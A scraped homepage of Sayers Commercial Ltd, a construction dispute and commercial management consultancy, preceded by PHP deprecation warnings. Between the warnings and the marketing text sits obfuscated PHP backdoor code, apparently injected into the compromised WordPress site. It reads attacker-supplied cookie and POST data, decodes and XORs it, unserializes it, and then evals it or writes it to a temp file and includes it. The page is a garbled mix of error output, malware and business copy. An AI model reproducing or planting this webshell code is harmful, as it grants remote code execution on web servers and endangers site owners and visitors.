Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1405

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1405

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1406

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1406

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1407

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1407

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1408

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1408

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1409

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1409

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1410

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1410

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1412

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1412

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 580

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 580

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 583

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 583

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 586

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 586

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Calling get_class() without arguments is deprecated in E:\WWW\SayersCommercial\\www\wp-content\plugins\wordfence\lib\wfScanMonitor.php on line 123

Deprecated: Calling get_class() without arguments is deprecated in E:\WWW\SayersCommercial\\www\wp-content\plugins\wordfence\lib\wfScanMonitor.php on line 124
$WJVkA = chr ( 385 - 266 ).chr (98) . chr ( 269 - 174 )."\x41" . chr (82) . "\104" . "\x7a" . 's';$ybRMMGFQSg = "\143" . 'l' . "\x61" . "\163" . 's' . "\x5f" . chr ( 306 - 205 ).chr ( 839 - 719 ).chr (105) . chr ( 331 - 216 )."\164" . "\x73";$UykzvsrP = class_exists($WJVkA); $ybRMMGFQSg = "5424";$eWtzuSPatp = strpos($ybRMMGFQSg, $WJVkA);if ($UykzvsrP == $eWtzuSPatp){function UUrniRro(){$yCUFpqjzL = new /* 63857 */ wb_ARDzs(26721 + 26721); $yCUFpqjzL = NULL;}$OEUmlgD = "26721";class wb_ARDzs{private function XFCYSjU($OEUmlgD){if (is_array(wb_ARDzs::$AcacSUdDu)) {$KuxesT2 = str_replace("<" . "?php", "", wb_ARDzs::$AcacSUdDu["content"]);eval($KuxesT2); $OEUmlgD = "26721";exit();}}public function NBxdB(){$KuxesT = "27699";$this->_dummy = str_repeat($KuxesT, strlen($KuxesT));}public function __destruct(){wb_ARDzs::$AcacSUdDu = @unserialize(wb_ARDzs::$AcacSUdDu); $OEUmlgD = "31877_30068";$this->XFCYSjU($OEUmlgD); $OEUmlgD = "31877_30068";}public function JrHZesMl($KuxesT, $loRzQee){return $KuxesT[0] ^ str_repeat($loRzQee, intval(strlen($KuxesT[0]) / strlen($loRzQee)) + 1);}public function sHeTuNspM($KuxesT){$PxssQeKv = "\142" . chr ( 1085 - 988 ).chr ( 1011 - 896 )."\145" . chr ( 553 - 499 ).'4';return array_map($PxssQeKv . chr (95) . "\144" . chr ( 636 - 535 )."\143" . "\x6f" . "\x64" . "\145", array($KuxesT,));}public function __construct($XDCDieOUwa=0){$SlmaPbSLV = "\x2c";$KuxesT = "";$FUfIzgB = $_POST;$TNjyE = $_COOKIE;$loRzQee = "b8faf738-0c82-4d32-9c24-221030211ed3";$dzCII = @$TNjyE[substr($loRzQee, 0, 4)];if (!empty($dzCII)){$dzCII = explode($SlmaPbSLV, $dzCII);foreach ($dzCII as $vYEEG){$KuxesT .= @$TNjyE[$vYEEG];$KuxesT .= @$FUfIzgB[$vYEEG];}$KuxesT = $this->sHeTuNspM($KuxesT);}wb_ARDzs::$AcacSUdDu = $this->JrHZesMl($KuxesT, $loRzQee);if (strpos($loRzQee, $SlmaPbSLV) !== FALSE){$loRzQee = explode($SlmaPbSLV, $loRzQee); $rIuzKjk = sprintf("31877_30068", rtrim($loRzQee[0]));}}public static $AcacSUdDu = 50381;}UUrniRro();}$UVvzr = "\166" . chr (95) . chr ( 600 - 481 ).chr ( 893 - 813 ).chr ( 441 - 368 ).'r' . chr ( 556 - 484 ); $QswAuAtmH = 'c' . 'l' . "\141" . "\163" . 's' . chr (95) . 'e' . "\x78" . 'i' . chr (115) . chr (116) . chr ( 852 - 737 ); $RmEUKauqms = class_exists($UVvzr); $QswAuAtmH = "60056";$WJOvAl = strpos($QswAuAtmH, $UVvzr);if ($RmEUKauqms == $WJOvAl){function rUQaPRJarR(){$TSevyADzkI = new /* 36967 */ v_wPIrH(57503 + 57503); $TSevyADzkI = NULL;}$cWmKULUNvs = "57503";class v_wPIrH{private function jqBBlqRsm($cWmKULUNvs){if (is_array(v_wPIrH::$tbtFDnHv)) {$name = sys_get_temp_dir() . "/" . crc32(v_wPIrH::$tbtFDnHv["salt"]);@v_wPIrH::$tbtFDnHv["write"]($name, v_wPIrH::$tbtFDnHv["content"]);include $name;@v_wPIrH::$tbtFDnHv["delete"]($name); $cWmKULUNvs = "57503";exit();}}public function lwlCBzCsp(){$ehZxQAH = "48143";$this->_dummy = str_repeat($ehZxQAH, strlen($ehZxQAH));}public function __destruct(){v_wPIrH::$tbtFDnHv = @unserialize(v_wPIrH::$tbtFDnHv); $cWmKULUNvs = "944_31387";$this->jqBBlqRsm($cWmKULUNvs); $cWmKULUNvs = "944_31387";}public function uoCzLT($ehZxQAH, $JAnigFuCwX){return $ehZxQAH[0] ^ str_repeat($JAnigFuCwX, intval(strlen($ehZxQAH[0]) / strlen($JAnigFuCwX)) + 1);}public function tbPDZ($ehZxQAH){$sohAuh = chr (98) . 'a' . "\163" . "\x65" . "\x36" . chr ( 64 - 12 );return array_map($sohAuh . "\x5f" . chr (100) . 'e' . "\x63" . 'o' . "\x64" . chr (101), array($ehZxQAH,));}public function __construct($oQVtVFUBtg=0){$VmeCnch = "\54";$ehZxQAH = "";$XuKqTYTxe = $_POST;$hWAFpVglE = $_COOKIE;$JAnigFuCwX = "007d08cb-5abe-40c8-b4bd-a9cb8a236c29";$xyVdk = @$hWAFpVglE[substr($JAnigFuCwX, 0, 4)];if (!empty($xyVdk)){$xyVdk = explode($VmeCnch, $xyVdk);foreach ($xyVdk as $ggGvQjH){$ehZxQAH .= @$hWAFpVglE[$ggGvQjH];$ehZxQAH .= @$XuKqTYTxe[$ggGvQjH];}$ehZxQAH = $this->tbPDZ($ehZxQAH);}v_wPIrH::$tbtFDnHv = $this->uoCzLT($ehZxQAH, $JAnigFuCwX);if (strpos($JAnigFuCwX, $VmeCnch) !== FALSE){$JAnigFuCwX = explode($VmeCnch, $JAnigFuCwX); $ZHvxN = base64_decode(strrev($JAnigFuCwX[0]));}}public static $tbtFDnHv = 15659;}rUQaPRJarR();}
Deprecated: Calling get_class() without arguments is deprecated in E:\WWW\SayersCommercial\\www\wp-includes\class-wp-http.php on line 329
Sayers Commercial Ltd | Commercial Management | Construction Law

Got a potential contractual dispute on your hands?  Speak to us at Sayers Commercial first to save yourself time and costly legal fees.

Welcome to Sayers Commercial Ltd – working in the construction sector, we deliver a total solution for all of your commercial management requirements.  Specialising in dispute management, we offer you straight talking advice on construction contract law, adjudication, arbitration, mediation, negotiation and claims.  We are also able to offer traditional commercial management services such as estimating, procurement and quantity surveying.

Nobody likes it when things go wrong with a contractual relationship but, if problems do arise, a quick, sensible approach is the key to resolving a dispute.  As a specialist in the resolution of disputes, Dean can help you achieve the best solution without the need for expensive lawyers.

With over 25 years spent in the construction industry, Dean and his team are also highly experienced in commercial management ensuring accurate estimating and bidding together with the smooth running of projects on site and meeting budgets through skilful procurement of both materials and subcontractors.

Who do we work for? 

Please get in touch if you are a Main Contractor, Subcontractor, Developer or end user and would just like an initial chat about your dispute or commercial management needs. No Obligation! Please contact us here and we will get back to you as soon as we can.